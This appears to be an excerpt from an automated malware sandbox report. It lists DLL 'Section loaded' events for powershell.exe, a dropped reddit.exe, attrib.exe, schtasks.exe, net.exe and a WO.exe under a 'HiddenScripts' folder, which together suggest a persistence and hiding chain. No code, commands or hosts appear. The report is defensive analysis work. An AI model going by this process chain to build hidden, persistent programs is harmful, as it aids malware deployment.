                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dllJump to behavior
                                  Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeSection loaded: wsock32.dll
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeSection loaded: mswsock.dll
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeSection loaded: wsock32.dll
                                  Source: C:\Users\user\AppData\Local\Temp\reddit.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                                  Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                                  Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
                                  Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: winmm.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: appresolver.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: slc.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sppc.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: pcacli.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Roaming\HiddenScripts\WO.exeSection loaded: sfc_os.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
